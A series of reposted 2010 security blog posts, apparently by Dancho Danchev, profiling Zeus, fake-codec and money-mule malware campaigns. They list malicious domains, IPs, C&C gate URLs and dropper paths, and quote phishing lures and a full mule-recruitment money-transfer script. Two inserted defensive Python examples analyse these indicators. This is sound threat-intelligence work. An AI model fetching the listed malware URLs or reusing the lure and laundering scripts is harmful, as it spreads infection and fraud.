pgcnbgkk.cn - Email: wang9619@163.com
xvriomwk.cn - Email: wang9619@163.com
bfhqrmtm.cn - Email: wang9619@163.com
cfssixsn.cn - Email: wang9619@163.com
vxoyqgcp.cn - Email: wang9619@163.com
hjwbxhqr.cn - Email: wang9619@163.com
frrszqot.cn - Email: wang9619@163.com
axaldjqt.cn - Email: wang9619@163.com
aafoocgv.cn - Email: wang9619@163.com
[Graph: domains parked on 195.88.190.30, AS49093]

It's worth pointing out that in February a much more extensive portfolio of domains was parked on 195.88.190.30, with a small part of them now responding to the GazTransitStroy/GazTranZitStroy AS:

arufeudv.cn - Email: wang9619@163.com
axaldjqt.cn - Email: wang9619@163.com
bbivbblr.cn - Email: wang9619@163.com
cfssixsn.cn - Email: wang9619@163.com
dcueqzke.cn - Email: wang9619@163.com
drghzeap.cn - Email: wang9619@163.com
fqfmyvii.cn - Email: wang9619@163.com
gjjdrgqf.cn - Email: wang9619@163.com
gokzlykr.cn - Email: wang9619@163.com
gwsdwxae.cn - Email: wang9619@163.com
icnzlxyo.cn - Email: wang9619@163.com
inkqoevl.cn - Email: wang9619@163.com
izhdjcsu.cn - Email: wang9619@163.com
lsggdniu.cn - Email: wang9619@163.com
maaltsxg.cn - Email: wang9619@163.com
mdftfxek.cn - Email: wang9619@163.com
ntvftguu.cn - Email: wang9619@163.com
pgcnbgkk.cn - Email: wang9619@163.com
rbpwnrss.cn - Email: wang9619@163.com
rzwdcsey.cn - Email: wang9619@163.com
urybtnfb.cn - Email: wang9619@163.com
uzfbhofi.cn - Email: wang9619@163.com
vnvxltpr.cn - Email: wang9619@163.com
vordquyo.cn - Email: wang9619@163.com
xvrlomwk.cn - Email: wang9619@163.com
ycgezkpu.cn - Email: wang9619@163.com
ykcdffei.cn - Email: wang9619@163.com
yvuxksuk.cn - Email: wang9619@163.com
zdzhecim.cn - Email: wang9619@163.com

Fake codecs serving domains parked at 91.212.41.88:

real-time-tube.com - Email: admin@free-new-sex-video.com
myusmailservice.com
video-chronicle.com - Email: neujelivsamomdeli@safe-mail.net
yahoo-movies-online.com - Email: admin@yahoo-movies-online.com
houstonhotelreal.com - Email: admin@houstonhotelreal.com
sex-tapes-celebs.com - Email: wnscandals@gmail.com
evertrands.com - Email: moldavimo@safe-mail.net
myusmailservices.com - Email: admin@myusmailservices.com
xplacex.com - Email: i.jahmurphy@gmail.com
xsebay.com - Email: admin@xsebay.com
exsebay.com - Email: admin@exsebay.com
video-info.info - Email: videinfo@gmail.com
partner777.net - Email: potenciallio@safe-mail.net
video-trailers.net - Email: fullhdvid@gmail.com
primusdns.ru - Email: samm_87@email.com
aervrfhu.ru - Email: samm_87@email.com

Sample redirection takes place through the following sampled domains:

- yahoo-movies-online.com/ iframe7.php
- real-web-tube.com/ xplay.php?id=40018 - 59.53.91.124
- multimediasupersite.com/ video-plugin.40018.exe - 62.212.66.93

Serving video-plugin.40018.exe - [9]W32/FakeAlert.FT.gen!Eldorado - Result: 10/42 (23.81 %), which phones back to:

yourartmuseum.com/fakbwq.php?q=RANDOM - 66.96.219.38 - Email: davidearhart@rocketmail.com



rareartonline.com - 64.191.44.73 - Email: fellows@nonpartisan.com

sportscararts.com - 209.159.146.234 - Email: cdaniels@pennsylvania.usa.com

expressautoarts.com - 69.10.35.253 - Email: cdaniels@pennsylvania.usa.com

zenovy.com/resolution.php - 66.96.222.198

bokwer.com/borders.php - 64.120.144.119

Domains hosting the fake codec plugin are parked at 62.212.66.93:

bestinternetmedia.com - Email: shoemaker@angelic.com
supermediaworld.com - Email: shoemaker@angelic.com
hottrackdvd.com - Email: bailey@theplate.com
multimediatoolguide.com - Email: severson@therange.com
thebettermovie.com - Email: bailey@theplate.com
movietoolonline.com - Email: severson@therange.com
movietoolvideo.com - Email: shann@techie.com
movielocationinfo.com - Email: maldonado@toke.com
bestmultimediademo.com - Email: mcchristian@ymail.com
dvddatacenter.com - Email: maldonado@toke.com
videotooldirect.com - Email: shann@techie.com



In gaz they trust, cybercriminals I don't trust. 

This post has been reproduced from [10]Dancho Danchev's blog. Follow him [11]on Twitter.

1. https://zeustracker.abuse.ch/monitor.php?as=29371

2. https://zeustracker.abuse.ch/monitor.php?as=29371

3. http://ddanchev.blogspot.com/2009/05/gaztranzitstroyinfo-fake-russian-gas.html

4. http://ddanchev.blogspot.com/2009/06/gaztransitstroygaztranzitstroy-rubbing.html

5. https://www.virustotal.com/analisis/d1101df370df904ff6e28b96eb1531f1d7083e6e220073d9c9eda479e563fa77-1269375808

6. https://www.virustotal.com/analisis/45c7dcb23000feaff0e47debc4ba55d7942fd62604200c3e137ec83b3b05b616-1269375843

7. https://www.virustotal.com/analisis/1112b6b6b2ee3a4ee993ebe7f51fbcdf882b202aa47388697b01de60bc1fff46-1269375852

8. http://www.virustotal.com/analisis/a34a96a9b198c9bb4c2f5087cfc66970ac70217c4d52f0c8445e92930f6f415b-1269378273

9. http://www.virustotal.com/analisis/734f3168bc22c1945553ff46f8f2f45f9b958d60ef26a5e027ba955ed8b77a42d-1269381200

10. http://ddanchev.blogspot.com/

11. http://twitter.com/danchodanchev
Zeus Crimeware/Client-Side Exploits Serving Campaign in the Wild (2010-03-24 20:29)

[1]

UPDATED: Friday, March 26, 2010: In a typical multitasking fashion like the one we've seen in previous campaigns, more typosquatted domains are being introduced, this time using the [2]well known IRS Fraud Application theme.

What's worth pointing out is that, just like the "[3]Scareware, Sinowal, Client-Side Exploits Serving Spam Campaign in the Wild" campaign from last week, the current one is also launched on a Friday.

The reason? A pointless attempt by the gang to increase the lifecycle of the campaign.
- Sample URL: irs.gov.faodqt.com.pl /fraud.applications/application/statement.php

- Client-side exploits serving iFrame URL: klgs.trfafsegh.com /index.php

- Sample detection rate: tax-statement.exe - [4]Trojan-Spy.Win32.Zbot - Result: 29/42 (69.05 %), phones back to [5]shopinfmaster.com /cnf/shopinf.jpg
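The lure hostname above (irs.gov.faodqt.com.pl, and later in this post the archive.pasweq.co.kr pattern) puts a trusted name in the leftmost labels while the registrable domain is the spammer's own. The following Python is an added example, not code from the post, showing how a mail or proxy filter can split such a hostname into its registrable domain and flag a trusted zone that appears only as a subdomain prefix. The two-label suffix table and the list of trusted zones are assumptions limited to what this post mentions; a real deployment would load the full Public Suffix List.

```python
from urllib.parse import urlsplit

# Two-label public suffixes that occur in this post's indicators. This
# short table is an assumption for the example; production code should
# load the full Public Suffix List instead.
MULTI_LABEL_SUFFIXES = {"com.pl", "co.kr"}

# Trusted zones the lures impersonate (assumed list for the example).
TRUSTED_ZONES = ("irs.gov",)


def host_of(url):
    """Hostname of a URL written with or without a scheme."""
    if "://" not in url:
        url = "http://" + url
    return urlsplit(url).hostname


def registrable_domain(host):
    """Owner-controlled part of a hostname: the label directly under the
    public suffix, e.g. faodqt.com.pl for irs.gov.faodqt.com.pl."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def impersonated_zone(host, trusted=TRUSTED_ZONES):
    """Return the trusted zone a host impersonates in its subdomain labels,
    or None when the host genuinely lies under that zone (or under none)."""
    host = host.lower().rstrip(".")
    for zone in trusted:
        if host == zone or host.endswith("." + zone):
            return None  # really inside the trusted zone
        if "." + zone + "." in "." + host + ".":
            return zone  # zone appears as a label run, but ownership differs
    return None


def triage(urls):
    """Map each URL to (registrable domain, impersonated zone or None)."""
    out = {}
    for url in urls:
        host = host_of(url)
        out[url] = (registrable_domain(host), impersonated_zone(host))
    return out


# Constructed from the indicators in this post plus one legitimate URL.
SAMPLE_URLS = [
    "irs.gov.faodqt.com.pl/fraud.applications/application/statement.php",
    "klgs.trfafsegh.com/index.php",
    "archive.pasweq.co.kr/id1007zx/get.php?email=email@mail.com",
    "http://www.irs.gov/",
]

if __name__ == "__main__":
    for url, (reg, zone) in triage(SAMPLE_URLS).items():
        print(f"{url}\n    registrable={reg} impersonates={zone}")
```

The useful output for blocking is the registrable domain (faodqt.com.pl, pasweq.co.kr), not the full lure hostname, since the gang can mint any number of subdomains under the same registration.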

Spamvertised and currently active fast-fluxed domains include:

AS40676
AS29131
AS209

fercca.com.pl
fercci.com.pl
ferkci.com.pl
fercki.com.pl
foodat.com.pl
foocit.com.pl
forcit.com.pl
footit.com.pl
ferckt.com.pl
forckt.com.pl
foodot.com.pl
footot.com.pl
faodqt.com.pl
foodyt.com.pl
redee3e.com
redee3e.com.pl
redee3e.pl
redee3o.com.pl
eddpiii.com.pl
eddsiii.com.pl
eddsiip.com.pl
eddsiui.com.pl
eddsiuo.com.pl
eddsiuy.com.pl
edduiip.com.pl
edduiiz.com.pl
edduyiz.com.pl
edouyiz.com.pl
ekouyiz.com.pl

Name server of notice:

ns1.globalistory.net - 87.117.245.9 - Email: tompsongand@aol.com

One of [6]TROYAK-AS's most aggressive customers (they used to host their Zeus C&Cs there) for Q1, 2010 is once again (the latest campaign is from March 12th, 2010 - [7]Scareware, Sinowal, Client-Side Exploits Serving Spam Campaign in the Wild) attempting to build a crimeware botnet by spamvertising the [8]well known PhotoArchive theme, in between serving client-side exploits using an embedded iFrame on the domains in question.

[9] 

In terms of quality assurance, the campaign continues to use its proven structure. The actual pages host a binary for manual download, in between the iFrame which would inevitably drop the Zeus crimeware.

Just like in previous campaigns, the gang continues to exclusively [10]register its domains using the ALANTRON BLTD. domain registrar. Let's dissect the ongoing campaign's structure, and expose the domains and ASs participating in it.

Sample URL/subdomain structure:

archive.pasweq.co.kr /id1007zx/get.php?email=email@mail.com

photostock.pasweq.co.kr
archives.pasweq.co.kr
letitbit.pasweq.co.kr
photobank.pasweq.co.kr
photosbank.pasweq.co.kr
photostock.pasweq.co.kr

Sample message: "Photos Archives Hosting has a zero-tolerance policy against ILLEGAL content. All archives and links are provided by 3rd parties. We have no control over the content of these pages. We take no responsibility for the content on any website which we link to, please use your own discretion while surfing the links. © 2007-2009, Photos Archives Hosting Group, Inc. - ALL RIGHTS RESERVED."


[11]

Sample iFrames embedded on the pages include: cogs.trfafsegh.com /index.php - 59.53.91.192 - Email: maple@qx8.ru; klgs.trfafsegh.com /index.php

Sample iFrame campaign structure:

- cogs.trfafsegh.com /index.php
- cogs.trfafsegh.com /I.php
- cogs.trfafsegh.com /statistics.php
- klgs.trfafsegh.com /index.php
- klgs.trfafsegh.com /I.php
- klgs.trfafsegh.com /statistics.php

[12]

Parked on the same IP as the iFrame domain are also the following Zeus C&Cs: dogfoog.net - Email: drier@qx8.ru; countrtds.ru - Email: thru@freenetbox.ru - [13]AS4134 (CHINANET-BACKBONE No.31 Jin-rong Street)

Detection rates: zeus.js - [14]Trojan.JS.Agent.bik - Result: 1/41 (2.44 %), serving update.exe - [15]PWS:Win32/Zbot.gen!R - Result: 17/42 (40.48 %); PhotoArchive.exe - [16]Trojan.Zbot - Result: 18/41 (43.91 %). The client-side exploitation relies on the Phoenix Exploit Kit.

Samples phone back to: shopinfmaster.com /cnf/shopinf.jpg - 78.2.153.153; 75.172.92.77; 78.84.78.179; 86.106.228.77; 184.56.245.136; 68.49.19.6 - Email: Duran@example.com; shopinfmaster.com /shopinf/gate.php

The campaign relies on the ns1.starwarfan.net name server, which is also connected to other Zeus crimeware C&Cs that respond to the same IPs: smotril23.com - Email: smot-smot@yandex.ru; domainsupp.net - Email: ErnestJ-Booth@example.com [17]

Active and fast-fluxed subdomains+domains participating in the campaign:

pasweokz.com - Email: romavesela@yahoo.com
pasweq.co.kr - Email: romavesela@yahoo.com
archive.pasweokz.com
archive.pasweq.co.kr
archives.pasweokz.com
archives.pasweq.co.kr
letitbit.pasweokz.com
letitbit.pasweq.co.kr
photobank.pasweokz.com
photobank.pasweq.co.kr
photosbank.pasweokz.com
photosbank.pasweq.co.kr
photoshock.pasweokz.com
photoshock.pasweq.co.kr
photostock.pasweokz.com
photostock.pasweq.co.kr

Name servers currently in use were also seen in February, 2010 ([18]IRS/PhotoArchive Themed Zeus/Client-Side Exploits Serving Campaign in the Wild):

ns1.addressway.net - 87.117.192.79 - Email: poolbill@hotmail.com

ns1.skc-realty.com - 87.117.192.79 - Email: skc@realty.net

Updates will be posted as soon as new developments emerge. Consider going through the related posts to catch up with the gang's activities for Q1, 2010.

Related posts: 



[19] Scareware, Sinowal, Client-Side Exploits Serving Spam 
Campaign in the Wild 

[20] TROYAK-AS: the cybercrime-friendly ISP that just won't 
go away 

[21] AS50215 Troyak-as Taken Offline, Zeus C &Cs Drop from 
249 to 181 

[22] Outlook Web Access Themed Spam Campaign Serves 
Zeus Crimeware 

[23] Pushdo Serving Crimeware, Client-Side Exploits and 
Russian Bride Scams 

[24] PhotoArchive Crimeware/Client-Side Exploits Serving 
Campaign in the Wild 

[25] Tax Report Themed Zeus/Client-Side Exploits Serving 
Campaign in the Wild 

[26] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

This post has been reproduced from [27]Dancho Danchev's blog. Follow him [28]on Twitter.
18. http://ddanchev.blogspot.com/2010/02/irsphotoarchive-themed-zeusclient-side.html

22. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html

23. http://ddanchev.blogspot.com/2010/01/pushdo-serving-

24. http://ddanchev.blogspot.com/2010/02/photoarchive-

26. http://ddanchev.blogspot.com/2010/02/keeping-money-mule-recruiters-on-short.html

27. http://ddanchev.blogspot.com/
Copyright Lawsuit Filed Against You Themed Malware Campaign (2010-03-29 17:42)

Having just received a copy of what appears to be the last active domain involved in last week's "[1]Copyright Lawsuit filed against you" themed [2]malware campaign, it's time to conduct a brief assessment of its inner workings.

Subject used: Copyright Lawsuit filed against you 

Sample message: March 24, 2010

Crosby & Higgins
350 Broadway, Suite 300
New York, NY 10013

To Whom It May Concern:

On the link below is a copy of the lawsuit that we filed against you in court on March 11, 2010. Currently the Pretrial Conference is scheduled for April 11th, 2010 at 10:30 A.M. in courtroom #36. The case number is 3485934.

The reason the lawsuit was filed was due to a completely inadequate response from your company for copyright infringement that our client Touchstone Advisories Inc is a victim of. Copyright infringement

www.touchstoneadvisorsonline.com /lawsuit/suit_documents.doc

Touchstone Advisories Inc has proof of multiple Copyright Law violations that they wish to present in court on April 11th, 2010.

Sincerely,

Mark R. Crosby

Crosby & Higgins LLP

Detection rates:

- complaint.doc - [3]Downloader.Lapurd - Result: 22/39 (56.42 %)

- complaint_docs.pdf - [4]Trojan-Clicker.Win32.Cycler.odn - Result: 27/42 (64.29 %)

Samples phone back to:

- 121.14.149.132 /fwq/indux.php?U=RANDOM DATA - AS4134, CHINA-TELECOM China Telecom

- 121.14.149.132 /hia12/ter.php?u=UserName&C=COMPUTERNAME&v=RANDOM DATA

Active C&C administration panel at: 121.14.149.132 /hia12/sca.php - returns "SSL ONLY. USE HTTPS"

Spamvertised domains involved in the campaign:

- touchstoneadvisorsonline.com /lawsuit/suit_documents.doc - 72.167.232.84

- marcuslawcenter.com /s/r439875.doc - 173.201.145.1 - Email: info@tedvernon.com

- danilison.com /suit/complaint.doc - 72.167.183.15

- daughtersofcolumbus.com /suit/complaint.doc - ACTIVE - 173.201.97.1 - Email: charlenej@stny.rr.com

The same phone back IP was also profiled in [5]another campaign from January, 2010.

Clearly, the cybercriminals behind it are aiming to stay beneath the radar by relying on not so well profiled malicious infrastructure, combined with newly introduced campaigns, in an attempt to make it harder to establish historical connections (read about the [6]"aggregate-and-forget" concept in respect to botnets/malware) between the rest of their malicious activities.

This post has been reproduced from [7]Dancho Danchev's blog. Follow him [8]on Twitter.
Money Mule Recruitment Campaign Serving Client-Side Exploits (2010-03-30 18:51)

Remember [1]Cefin Consulting & Finance, the bogus money mule recruitment company that ironically tried to recruit me last month?

They are back, with a currently ongoing money mule recruitment campaign, this time not just attempting to recruit gullible users, but also serving client-side exploits ([2]CVE-2009-1492; [3]CVE-2007-5659) through an embedded JavaScript on each and every page within the recruitment site.

Let's dissect the campaign, expose the client-side exploits serving domains and the Zeus crimeware serving domains parked within the same netblock as the mule recruitment site itself, and ultimately expose a bogus furniture company hosting a pretty descriptive cv.exe that is dropped on the infected host.

Initial recruitment email sent from financialcefin@aol.com:

Hello, Our Company is ready to offer full and part time job in your region. It is possible to apply for a well-paid part time job from your state. More information regarding working and cooperation opportunities will be sent upon request. Please send all further correspondence ONLY to Company's email address: james.mynes.cf@gmail.com

Best regards

Response received:

Greetings,

Cefin Consulting & Finance company thanks you for being interested in our offer. All additional information about our company you may read at our official site. www.ceffincfin.com Below are the details of the vacancy operational scheme:

1. The payment notice and the details of the beneficiary for further payment transfer will be e-mailed to your box. All necessary instructions regarding the payment will be enclosed.

2. As a next step, you'll have to withdraw cash from our account.

3. Afterwards you shall find the nearest Western Union office and make a transfer. Important: Only your first and last names shall be mentioned in the Western Union Form! No middle name (patronymic) is written! Please check carefully the spelling of the name, as it has to correspond to the spelling in the Notice.

4. Go back home soonest possible and advise our operator on the payment details (Sender's Name, City, Country, MTCN (Money Transfer Control Number), Transfer Amount).

5. Our operator will receive the money and send it to the customer.

6. Please be ready to accept and to make similar transfers 2-5 times a week or even more often. Therefore you have to be on alert to make a Western Union payment any time.

Should you face any problems incurred in the working process, don't hesitate to contact our operator immediately. If you have any questions, please do not hesitate to contact us by e-mail. If you have understood the meaning of work and are ready to begin working with us, please send us your INFO in the following format:

1) First name 2) Last name 3) Country 4) City 5) Zip code 6) Home Phone number, Work Phone number, Mobile Phone number 7) Bank account info: a) Bank name b) Account name c) Account number d) Sort code 8) Scan of your passport or driver license

2010 © Cefin Consulting & Finance
All rights reserved.

Money mule recruitment URL: ceffincfin.com - 93.186.127.252 - Email: winter343@hotmail.com - [4]currently flagged as malicious.

Once deobfuscated, the JavaScript attempts to load the client-side exploits serving URL click-clicker.com /click/in.cgi?3 - 195.78.109.3; 195.78.108.221 - Email: aniwaylin@yahoo.com, or click-clicker.com - 195.78.109.3 - Email: aniwaylin@yahoo.com.

Sample campaign structure:

- click-clicke.com /cgi-bin/plt/n006106203302r0009R81fc905cX409b2ddfY0a607663Z0100f055

Parked on the same IP (91.213.174.52) are also the following client-side exploit serving domains:

click-reklama.com - Email: tahli@yahoo.com
googleinru.in - Email: mirikas@gmail.com

Within AS29106, VolgaHost-as PE Bondarenko Dmitriy Vladimirovich, we also have the following client-side exploits/crimeware friendly domains:

benlsdenc.com - Email: blablaman25@gmail.com
nermdusa.com - Email: polakurt69@gmail.com
mennlyndy.com - Email: albertxxl@gmail.com
kemilsy.com - Email: VsadlusGruziuk@gmail.com
benuoska.com - Email: godlikesme44@gmail.com
Name servers of notice: ns1.ginserdy.com - 93.186.127.205 - Email: albertxxl@gmail.com and ns1.ndnsgw.net - 195.78.109.3 - Email: aniwaylin@yahoo.com have also been registered using the same emails as the original client-side exploit serving domains.
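The reasoning above (and in the Zeus campaign post earlier on this page) pivots on two attributes shared across indicators: the registrant email and the hosting IP. As an added example that is not part of the original post, this Python parses lines written in the post's own "domain - IP - Email: address" notation, indexes them by both attributes and walks the shared attributes transitively to recover the cluster an analyst would draw by hand. The sample lines are copied from this post; the parser assumes one IP per line (the post's "ip1; ip2" lists would need splitting first).

```python
import re
from collections import defaultdict

# Indicator lines in the post's own notation, copied from this post.
# Lines may carry an IP, an email, both, or neither.
SAMPLE_LINES = """
click-clicker.com - 195.78.109.3 - Email: aniwaylin@yahoo.com
click-reklama.com - 91.213.174.52 - Email: tahli@yahoo.com
googleinru.in - 91.213.174.52 - Email: mirikas@gmail.com
mennlyndy.com - Email: albertxxl@gmail.com
ns1.ginserdy.com - 93.186.127.205 - Email: albertxxl@gmail.com
ns1.ndnsgw.net - 195.78.109.3 - Email: aniwaylin@yahoo.com
ceffincfin.com - 93.186.127.252 - Email: winter343@hotmail.com
"""

# domain, then an optional " - <ipv4>", then an optional " - Email: <addr>"
LINE_RE = re.compile(
    r"^(?P<domain>[a-z0-9.-]+)"
    r"(?:\s*-\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3}))?"
    r"(?:\s*-\s*Email:\s*(?P<email>\S+@\S+))?\s*$",
    re.IGNORECASE,
)


def parse_iocs(text):
    """Return (domain, ip or None, email or None) tuples; prose lines are skipped."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        m = LINE_RE.match(line) if line else None
        if not m:
            continue
        email = (m["email"] or "").lower() or None
        records.append((m["domain"].lower(), m["ip"], email))
    return records


def pivot(records):
    """Index domains by shared registrant email and by shared hosting IP."""
    by_email, by_ip = defaultdict(set), defaultdict(set)
    for domain, ip, email in records:
        if email:
            by_email[email].add(domain)
        if ip:
            by_ip[ip].add(domain)
    return by_email, by_ip


def linked_domains(records, seed):
    """Every domain reachable from `seed` through a chain of shared
    emails or IPs: the infrastructure cluster the post walks by hand."""
    by_email, by_ip = pivot(records)
    keys = defaultdict(set)  # domain -> {("email", addr), ("ip", addr)}
    for domain, ip, email in records:
        if email:
            keys[domain].add(("email", email))
        if ip:
            keys[domain].add(("ip", ip))
    seen, frontier = {seed}, [seed]
    while frontier:
        current = frontier.pop()
        for kind, value in keys.get(current, ()):
            members = by_email[value] if kind == "email" else by_ip[value]
            for member in members:
                if member not in seen:
                    seen.add(member)
                    frontier.append(member)
    return sorted(seen)


if __name__ == "__main__":
    recs = parse_iocs(SAMPLE_LINES)
    for seed in ("click-clicker.com", "mennlyndy.com", "ceffincfin.com"):
        print(seed, "->", linked_domains(recs, seed))
```

The transitive walk is what makes a name server like ns1.ndnsgw.net fall into the same cluster as the exploit-serving domain even when an analyst starts from either end; a domain that shares nothing (ceffincfin.com here) stays a cluster of one, which is the signal to look for other pivots such as netblock or name server.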

Sample detection rates, and phone back locations:

- cefin.js - [5]Troj/IFrame-DY - Result: 1/42 (2.39 %)

- clicker.pdf - [6]Exploit.PDF-JS.Gen; Exploit:Win32/Pdfjsc.EM - Result: 21/42 (50.00 %)

- clicker2.exe - [7]TR/Sasfis.akdv.1; Trojan.Sasfis.akdv.1; Trojan.Win32.Sasfis.akdv - Result: 18/42 (42.86 %)

- cv.exe - [8]Trojan.Siggen1.15304 - Result: 3/42 (7.15 %)

- 1.exe - [9]Suspicious:W32/Malware!Gemini - Result: 4/42 (9.53 %)

Upon execution, the sample phones back to the Oficla/Sasfis C&C at socksbot.com /isb/gate.php?magic=121412150001&ox=2-5-1-2600&tm=3&id=24905431&cache=4154905385& - 195.78.109.3 - Email: aniwaylin@yahoo.com, which drops pozitiv.md/master/cv.exe - 217.26.147.24 - Email: v.pozitiv@mail.ru from the web site of a fake furniture company (PoZITIVe SRL).


Interestingly, today the update location has been changed to tds-style.spb.ru /error/1.exe. Detection rate:

- 1.exe - [10]Suspicious:W32/Malware!Gemini - Result: 4/42 (9.53 %)

The "Keeping Money Mule Recruiters on a Short Leash" series is bound to expand. Stay tuned!

Related coverage of money laundering in the context of cybercrime:

[11] Keeping Money Mule Recruiters on a Short Leash - Part Three

[12] Money Mule Recruiters on Yahoo!'s Web Hosting

[13] Dissecting an Ongoing Money Mule Recruitment Campaign

[14] Keeping Money Mule Recruiters on a Short Leash - Part Two

[15] Keeping Reshipping Mule Recruiters on a Short Leash

[16] Keeping Money Mule Recruiters on a Short Leash

[17] Standardizing the Money Mule Recruitment Process

[18] Inside a Money Laundering Group's Spamming Operations

[19] Money Mule Recruiters use ASProx's Fast Fluxing Services

[20] Money Mules Syndicate Actively Recruiting Since 2002
This post has been reproduced from [21]Dancho Danchev's blog. Follow him [22]on Twitter.

1. http://ddanchev.blogspot.com/2010/02/dissecting-ongoing-money-mule.html

2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1492

3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659

4. http://www.google.com/safebrowsing/diagnostic?site=http://ceffincfin.com/&hl=en

5. http://www.virustotal.com/analisis/20d56cbab6bfa901d94e5d9ce377ae9cbaf4e91ff5a283751d43f3c0ebb44eb5-1269880320

6. http://www.virustotal.com/analisis/1c9d558dabd32f3900005677655424ad8fde813fc71c5d157653dba953bdf8af-1269966639

7. http://www.virustotal.com/analisis/cc13cf35292fb9ee09c22fffa60bcabd5a653fea92f5dd02628735ee81e5fc4c-1269966625

8. http://www.virustotal.com/analisis/4928480e5192213fbbd14c66191b3009bd67226c0bec9b685a878664ea5a5723-1269966041

9. http://www.virustotal.com/analisis/d8456caf15ec23243bc8a988c792503d90323c1604ced76f90a5e3a941094c0e-1269966491

10. http://www.virustotal.com/analisis/d8456caf15ec23243bc8a988c792503d90323c1604ced76f90a5e3a941094c0e-1269966491

11. http://ddanchev.blogspot.com/2010/03/keeping-money-mule-recruiters-on-short.html

12. http://ddanchev.blogspot.com/2010/03/money-mule-recruiters-on-yahoos-web.html

13. http://ddanchev.blogspot.com/2010/02/dissecting-ongoing-money-mule.html

14. http://ddanchev.blogspot.com/2010/02/keeping-money-mule-recruiters-on-short.html

15. http://ddanchev.blogspot.com/2009/12/keeping-reshipping-mule-recruiters-on.html

16. http://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html

17. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

18. http://ddanchev.blogspot.com/2009/05/inside-money-laundering-groups-spamming.html

19. http://ddanchev.blogspot.com/2008/07/money-mule-recruiters-use-asproxs-fast.html

20. http://ddanchev.blogspot.com/2008/10/money-mules-syndicate-actively.html

21. http://ddanchev.blogspot.com/

22. http://twitter.com/danchodanchev
Summarizing Zero Day's Posts for March (2010-04-01 10:58)

The following is a brief summary of all of my posts at [1]ZDNet's Zero Day for March, 2010.

You [2]can also go through [3]previous summaries, as well as subscribe to my [4]personal RSS feed, [5]Zero Day's main feed, or follow me on Twitter.

Recommended reading - [6]TROYAK-AS: the cybercrime-friendly ISP that just won't go away; [7]The current state of the crimeware threat - Q&A and [8]From Russia with (objective) spam stats

01. [9]Police arrest Mariposa botnet masters, 12M+ hosts compromised

02. [10]Vodafone HTC Magic shipped with Conficker, Mariposa malware

03. [11]Mac OS X SMS ransomware - hype or real threat? + [12]Gallery

04. [13]TROYAK-AS: the cybercrime-friendly ISP that just won't go away

05. [14]Facebook password reset themed malware campaign in the wild

06. [15]The current state of the crimeware threat - Q&A

07. [16]From Russia with (objective) spam stats

08. [17]Survey: Millions of users open spam emails, click on links

09. [18]Trivial security flaw in popular iPhone app leads to privacy leak

10. [19]Report: 64 % of all Microsoft vulnerabilities for 2009 mitigated by Least Privilege accounts

This post has been reproduced from [20]Dancho Danchev's blog. Follow him [21]on Twitter.

1. http://blogs.zdnet.com/security

2. http://ddanchev.blogspot.com/2010/03/summarizing-zero-days-posts-for.html

3. http://ddanchev.blogspot.com/2010/02/summarizing-zero-days-posts-for-january.html

4. http://updates.zdnet.com/tags/dancho-i-danchev.html?t=0&s=0&o=1&mode=rss

5. http://feeds.feedburner.com/zdnet/security

6. http://blogs.zdnet.com/security/?p=5761

7. http://blogs.zdnet.com/security/?p=5797

8. http://blogs.zdnet.com/security/?p=5813

9. http://blogs.zdnet.com/security/?p=5587

10. http://blogs.zdnet.com/security/?p=5626

11. http://blogs.zdnet.com/security/?p=5731

12. http://content.zdnet.com/2346-12691_22-403883.html

13. http://blogs.zdnet.com/security/?p=5761

14. http://blogs.zdnet.com/security/?p=5787

15. http://blogs.zdnet.com/security/?p=5797

16. http://blogs.zdnet.com/security/?p=5813

17. http://blogs.zdnet.com/security/?p=5889

18. http://blogs.zdnet.com/security/?p=5935

19. http://blogs.zdnet.com/security/?p=5964

20. http://ddanchev.blogspot.com/

21. http://twitter.com/danchodanchev
Keeping Money Mule Recruiters on a Short Leash - Part Four (2010-04-09 10:54)

UPDATED: Saturday, April 10, 2010: Some of the mule recruitment sites appear to be interested in something else rather than recruiting mules - must be the oversupply of people unknowingly participating in the cybercrime ecosystem.

Several of the domains (for instance ortex-gourpinc.tw and augmentgroupinc.tw) are not accepting registrations, but are instead attempting to trick the visitor into downloading and executing a bogus psychological test.

"Below is a test prepared by professional psychologists and is required in order to be considered a competent candidate for the offered position. After successful completion of your test, you will be asked to register on our web site. If you are not ready to register right away, please wait to take the test at a later point. To REGISTER, simply run the test and you will be prompted to click on the "Register Now" button at any time and you will be redirected to the login page, without having to take the test again.

*This test is under development and we are grateful for all comments and suggestions. *If you are having trouble running the test and your computer is requesting administrative rights, download the test and simply right-click on the Test icon and select "Run As Administrator" from the menu."

- [1]testAugmentInc.exe - Result: 3/38 (7.9 %) - Trojan/Win32.Chifrax.gen; Reser.Reputation.1

- [2]testOrtexGroup.exe - Result: 3/39 (7.7 %) - Trojan/Win32.Chifrax.gen; Reser.Reputation.1

UPDATED: AS34305, EUROACCESS has taken down the IPs within their network. The money mule recruiters naturally have a contingency plan in place, and have migrated to [3]AS38356 - [4]TimeNet (222.35.143.112; 222.35.143.234; 222.35.143.235; 222.35.143.237) and AS21793 GOGAX (76.76.100.2; 76.76.100.4; 76.76.100.5).
Based on the already established patterns of this group, it was only a matter of time until they re-introduced yet another portfolio of money mule recruitment domains, combining them with spamvertised recruitment messages and forum postings.

Just like their campaign from last month ([5]Keeping Money Mule Recruiters on a Short Leash - Part Three), the current one is once again interacting exclusively with AS34305, EUROACCESS Global Autonomous System, including the newly introduced name servers.

What has changed? It's the [6]migration towards the use of fast-flux infrastructure for ZeuS crimeware serving campaigns, and in an isolated incident profiled in this post, a money mule recruitment campaign that's also sharing the same fast-flux infrastructure. Combined with the BIZCN.COM, INC. domain registrar's practice of accepting domain registrations using example.com emails, next to ignoring domain suspension requests, you end up with the perfect safe haven for a cybercrime operation.

In March, 2010, it took EUROACCESS less than 10 minutes to undermine their campaigns, including ones residing within the AS of a cybercrime-friendly customer known as 193.104.22.0/24 KratosRoute. However, it's interesting to observe their return to the same ISP, given that they were within a much more cybercrime-friendly neighborhood once EUROACCESS kicked them out last month.

